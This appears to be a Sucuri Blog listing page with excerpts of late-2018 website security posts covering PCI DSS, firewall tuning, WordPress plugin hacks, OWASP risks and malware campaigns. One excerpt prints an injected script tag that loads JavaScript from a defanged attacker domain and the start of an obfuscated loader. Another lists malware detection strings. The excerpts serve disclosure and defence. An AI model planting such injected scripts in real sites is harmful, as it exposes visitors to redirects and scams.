Call Us Today at 1-403-291-9811 or 1-866-291-3857

Web Security

  • PCI for SMB: Requirement 9 – Implement Strong Access Control Measures 16 November 2018 PCI for SMB: Requirement 9 – Implement Strong Access Control Measures

    Welcome to the sixth post of a series on understanding the Payment Card Industry Data Security Standard–PCI DSS. We want to show how PCI DSS affects anyone going through the compliance process using the PCI SAQ’s (Self Assessment Questionnaires).

    In the previous articles written about PCI, we covered the following:

    • Requirement 1: Build and Maintain a Secure Network – Install and maintain a firewall configuration to protect cardholder data.
    • Requirement 2: Build and Maintain a Secure Network – Do not use vendor-supplied defaults for system passwords or other security parameters.

    Continue reading PCI for SMB: Requirement 9 – Implement Strong Access Control Measures at Sucuri Blog.

  • Real-Time Fine-Tuning of the WAF via API 14 November 2018 Real-Time Fine-Tuning of the WAF via API

    Though the Sucuri Firewall is simple to set up and protects your website immediately, it’s possible to have granular control of the WAF by using an API.

    For instance, there’s a specific filter inside the WAF dashboard called Emergency DDoS. This filter basically increases the strength of the DDoS protection to an “emergency” level where most non-human access is blocked.

    API to Boost Firewall Protection

    The Firewall API is mostly used for whitelisting and clearing the website cache.

    Continue reading Real-Time Fine-Tuning of the WAF via API at Sucuri Blog.

  • Hackers Change WordPress Siteurl to Pastebin 13 November 2018 Hackers Change WordPress Siteurl to Pastebin

    Last Friday, we reported on a hack that used a vulnerability in the popular WP GDPR Compliance plugin to change WordPress siteurl settings to erealitatea[.]net. At that time it was not clear who was behind the massive attack, since the erealitatea[.]net domain didn’t work and the infection simply broke the compromised sites. Our SiteCheck scanner detected the infection on about 700 sites over the weekend and PublicWWW now currently returns 573 results.

    Continue reading Hackers Change WordPress Siteurl to Pastebin at Sucuri Blog.

  • Erealitatea[.]net Hack Corrupts Websites with WP GDPR Compliance Plugin Vulnerability 10 November 2018 Erealitatea[.]net Hack Corrupts Websites with WP GDPR Compliance Plugin Vulnerability

    We have noticed a growing number of WordPress-based sites that have had their URL settings changed to hxxp://erealitatea[.]net. Further investigations show that the issue is related to a security vulnerability in the WP GDPR Compliance plugin for WordPress (with 100,000+ active installations).

    The new General Data Protection Regulation (GDPR) laws in the EU have made the plugin extremely popular. Many sites are looking for an easy way to comply with these new laws.

    Continue reading Erealitatea[.]net Hack Corrupts Websites with WP GDPR Compliance Plugin Vulnerability at Sucuri Blog.

  • 10 Tips to Improve Your Website Security 7 November 2018 10 Tips to Improve Your Website Security

    Having a website has become easier than ever due to the proliferation of great tools and services in the web development space. Content management systems (CMS) like WordPress, Joomla!, Drupal, Magento, and others allow business owners to build an online presence rapidly. The CMS’s highly extensible architectures, rich plugins, and effective modules have reduced the need to spend years learning web development before starting to build a website.

    The ease of launching an online business or personal website is great.

    Continue reading 10 Tips to Improve Your Website Security at Sucuri Blog.

  • New WordPress Security Email Course 5 November 2018 New WordPress Security Email Course

    Recent statistics show that over 32% of website administrators across the web use WordPress.

    Unfortunately, the CMSs popularity comes at a price — attackers often seek out vulnerabilities to exploit and target unhardened WordPress sites. If a site is compromised, it often becomes the host of malicious malware or spam campaigns, harming your website’s reputation and visitors in the process.

    Knowledge is power, and we’re here to help! We’ve created a new WordPress Security Email Course to help improve your website’s security posture and reduce the risk of a security incident.

    Continue reading New WordPress Security Email Course at Sucuri Blog.

  • Website Security Tips for Marketers 31 October 2018 Website Security Tips for Marketers

    In our previous post, we have discussed why marketers should have a proactive approach to website security. Today we are going to discuss some security tips marketers can put into practice. In the simplest terms, website security means three things here at Sucuri:

    • Protecting your website from compromises.
    • Monitoring for issues so you can react quickly.
    • Having a documented emergency response plan.

    Marketers should champion these initiatives so they can be prioritized by their business development team.

    Continue reading Website Security Tips for Marketers at Sucuri Blog.

  • Web Marketers Should Learn Security 29 October 2018 Web Marketers Should Learn Security

    Most online marketers think of themselves as T-shaped individuals. The theory behind this concept is that individuals possess a wide range of skills, with some abilities running deeper than others.

    Website security awareness is in short supply and we need more champions — especially among small and medium-sized businesses. Digital marketers are in a prime position to add security know-how to their diverse toolkit.

    Source: The T-Shaped Web Marketer by Rand Fishkin

    It makes sense for marketers to want to secure their websites.

    Continue reading Web Marketers Should Learn Security at Sucuri Blog.

  • Saskmade[.]net Redirects 26 October 2018 Saskmade[.]net Redirects

    Earlier this week, we published a blog post about an ongoing massive malware campaign describing multiple infection vectors that it uses. This same week, we started detecting new modifications of the scripts injected by this attack.

    The general idea of the malware is the same, but the domain name and obfuscation has changed slightly.

    For example, in the wp_post table they now inject this script:

    <script src='hxxps://saskmade[.]net/head.js?ver=2.0.0' type='text/javascript'></script>

    In the <head> section of HTML and PHP files, and at the top of jQuery-related JavaScript files, they inject this new obfuscated script:

    var _0x1e35=['length','fromCharCode','createElement','type','async','code121','src','appendChild','getElementsByTagName','script'];(function(_0x546a53,
    ...skipped...

    Continue reading Saskmade[.]net Redirects at Sucuri Blog.

  • OWASP Top 10 Security Risks – Part II 25 October 2018 OWASP Top 10  Security Risks – Part II

    It is National Cyber Security Awareness Month and in order to bring awareness to what threatens the integrity of websites, we have started a series of posts on the OWASP top 10 security risks.

    The OWASP Top 10 list consists of the 10 most seen application vulnerabilities:

    1. Injection
    2. Broken Authentication
    3. Sensitive data exposure
    4. XML External Entities (XXE)
    5. Broken Access control
    6. Security misconfigurations
    7. Cross-Site Scripting (XSS)
    8. Insecure Deserialization
    9. Using Components with known vulnerabilities
    10. Insufficient logging and monitoring

    In our previous post, we explained the first two items on the OWASP Top 10 list: injection and broken authentication.

    Continue reading OWASP Top 10 Security Risks – Part II at Sucuri Blog.

  • Multiple Ways to Inject the Same Tech Support Scam Malware 23 October 2018 Multiple Ways to Inject the Same Tech Support Scam Malware

    Last month, we shared information about yet another series of ongoing massive infections using multiple different vectors to inject malicious scripts into WordPress websites.

    Shortly after, the campaign changed the domain names used in its scripts. Now it mainly uses hotopponents[.]site and learningtoolkit[.]club.

    At the time of this writing, PublicWWW finds the most common patterns of this malware on thousands of sites:

    • “var _0xfcc4=” – 8501 sites
    • “hotopponents.site/site.js” – 3636 sites

    Database Injections

    Multiple variations of the injected scripts have been found.

    Continue reading Multiple Ways to Inject the Same Tech Support Scam Malware at Sucuri Blog.